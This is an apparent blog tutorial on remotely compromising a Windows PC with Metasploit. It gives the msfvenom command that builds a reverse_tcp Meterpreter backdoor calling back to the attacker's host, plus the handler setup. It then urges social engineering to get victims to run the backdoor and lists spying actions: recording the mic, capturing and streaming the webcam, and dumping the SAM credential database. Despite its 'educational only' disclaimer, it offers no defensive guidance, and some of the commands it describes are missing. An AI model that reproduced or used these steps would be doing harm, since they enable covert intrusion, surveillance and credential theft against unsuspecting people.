Ever wondered how hackers hack the computers remotely in the movies. If you’re also one of those. No need to wonder anymore. In this tutorial you will see how hackers hack a computer with MetaSploit MSFVenom. When it comes to hacking computer or phone, Kali Linux takes the lead to be the one of the best operating system for hackers and pen testers as it’s packed with all the required tools one need to hack computer. One of the most lethal tool of Kali is MetaSploit for taking over the remote machines including computers, mobile phones, web servers and more.
Hacking a PC remotely isn’t that hard with MetaSploit. As MetaSploit is a terminal command based tool, you just need to learn some basic commands to do the hacking stuff with it. You can check out the most usable MetaSploit Commands to get started with it.
Note: This tutorial is for educational purposes only to show you how hackers do the penetration into remote systems and how to prevent them.
Hacking a PC Remotely with MetaSploit MSFVenom – Windows 10 Hacks
In order to get started with hacking a remote PC, you need following things;
- Kali Linux Operating System
- Metasploit Framework (It’s pre-packaged in Kali Linux)
- Windows OS Target Machine
This hacking demonstration is captured in a Virtual Environment which means, it doesn’t hack or harm any actual machine during the tutorial.
If you want to do the penetration testing or hacking in Virtual Environment, you need also the following things:
- Kali Linux VM Image
- Windows 10 Virtual Image
- Target Machine
Instructions to Hack a Computer Remotely
- Download and install Kali linux from their official website.
- Once Kali is installed, run the Kali Linux machine and perform an upgrade. In order to do that, just open a new terminal window and type the following command.
- As soon as it gets updated, run the metasploit framework by typing the msfconsole in the terminal window.
- Once the Metasploit starts, create and setup the backdoor. To do so, type the following commands.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.2.5 -f exe -o /root/Desktop/AnyName.exe
- Replace LHOST value to your internal IP address. You can find your IP through executing a command ifconfig in a new terminal. Also you can change the save location of the backdoor to your choice. For the sake of tutorial, I am choosing Desktop.
- Next thing is to do use of the exploit handler. The exploit handler will do handle the backdoor requests. Just type the following command to run the exploit handler.
set payload windows/meterpreter/reverse_tcp
- See the exploit options once the exploit handler is ready.
- After setting up the listening host IP and port, just type the following command to start the exploit.
exploit -j -z
- Here comes the part of spreading your backdoor to the victims. Be a social engineer here. With just a few little social engineering techniques to make the targets to install this backdoor to their PC. As someone runs your sent backdoor. A session will start in your Metasploit terminal and you’re in…
- It’s time to play with the victim machine. Now you can play and perform any specific action to the victim device. There’s hundreds of operations you can perform on the remote target device. Some of the most common and interesting things you can perfrom on the victim device.
Meterpreter Commands for Remote Actions
Record_mic command captures the live mic feed of the remote computer you’re connected with. Listen to all the live conversations of the victim through their mic.
This command initiates a live video chat session with the target computer.
It is used to capture the photos through remote device cam.
It’s used for live video streaming from the target mahcine’s webcam.
This command dumps all the contents of the SAM database.
You can check out all the most common Metasploit commands and meterpreter payloads.
Hope this tutorial would be helpful for you in learning how it works and how to hack a computer remotely with MetaSploit tutorial MSFVenom.